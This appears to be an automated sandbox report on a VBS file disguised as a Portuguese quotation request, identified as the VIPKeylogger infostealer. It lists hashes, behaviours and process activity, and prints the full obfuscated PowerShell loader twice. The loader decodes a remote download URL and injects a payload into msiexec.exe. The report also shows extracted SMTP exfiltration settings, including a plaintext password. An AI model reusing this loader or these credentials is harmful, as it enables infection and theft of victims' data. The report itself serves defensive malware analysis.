Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 14:46
Static task
static1
Behavioral task
behavioral1
Sample
Pedido de Cotação-24100004_lista comercial.vbs
Resource
win7-20240903-en
General
-
Target
Pedido de Cotação-24100004_lista comercial.vbs
-
Size
523KB
-
MD5
071b2e84cdf90885bce11e5713dab307
-
SHA1
ea48ea5b782669f05084a4a1e374ff64c8f581c0
-
SHA256
400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741
-
SHA512
a981122c9f3f2675f116c2b860e6f05016ab7be3a9cd9eee873af4f89ff7d93548cce9c020d79fa7bf191d04f664f127efadfdca5019b5ec2699498837d46664
-
SSDEEP
6144:BA/7iXwe0h73QXqs1SQl3GZF+lfd0okbN9VusXmFtzbVHcje9wYYhnQgjDHgs91+:LKhgamowdhkFuW0tXwjQg/p1+FWg
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.recsb.com - Port:
587 - Username:
[email protected] - Password:
1=vI*r6^ - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 5 2672 powershell.exe 7 2672 powershell.exe 9 1856 msiexec.exe 11 1856 msiexec.exe 13 1856 msiexec.exe 15 1856 msiexec.exe 16 1856 msiexec.exe 18 1856 msiexec.exe 20 1856 msiexec.exe 22 1856 msiexec.exe -
Processes:
powershell.exepowershell.exepid process 2672 powershell.exe 2972 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 checkip.dyndns.org -
Processes:
powershell.exepowershell.exepid process 2672 powershell.exe 2972 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 1856 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 2972 powershell.exe 1856 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepid process 2672 powershell.exe 2972 powershell.exe 2972 powershell.exe 1856 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeDebugPrivilege 1856 msiexec.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2248 wrote to memory of 2672 2248 WScript.exe powershell.exe PID 2248 wrote to memory of 2672 2248 WScript.exe powershell.exe PID 2248 wrote to memory of 2672 2248 WScript.exe powershell.exe PID 2972 wrote to memory of 1856 2972 powershell.exe msiexec.exe PID 2972 wrote to memory of 1856 2972 powershell.exe msiexec.exe PID 2972 wrote to memory of 1856 2972 powershell.exe msiexec.exe PID 2972 wrote to memory of 1856 2972 powershell.exe msiexec.exe PID 2972 wrote to memory of 1856 2972 powershell.exe msiexec.exe PID 2972 wrote to memory of 1856 2972 powershell.exe msiexec.exe PID 2972 wrote to memory of 1856 2972 powershell.exe msiexec.exe PID 2972 wrote to memory of 1856 2972 powershell.exe msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MHP6VHWR454BS9L5LFT.temp
Filesize7KB
MD553eb1a2da1daa6ff5f0ececcca12b7ef
SHA125998cd34dffa6cbdf55b227ab1a7fe728859e15
SHA2560366a5fb82142abd3491d6a802fb3599f42f168b2311158c1b9eb342f1d30bfa
SHA51246e1454dd024b8f56aa31b5c5ab6d33d26da1cc43cf0d6253763d9ee5fadaa425652bfde4d0c08a6a71505f4b91d283589fd472174a63d55c4956e60b325da21
-
Filesize
447KB
MD54fa4bfe12534bd26a9e268a1e659e510
SHA1f42014f4e7c0f11f4bb5f559c88310eb6db186a3
SHA25611afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0
SHA51234e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01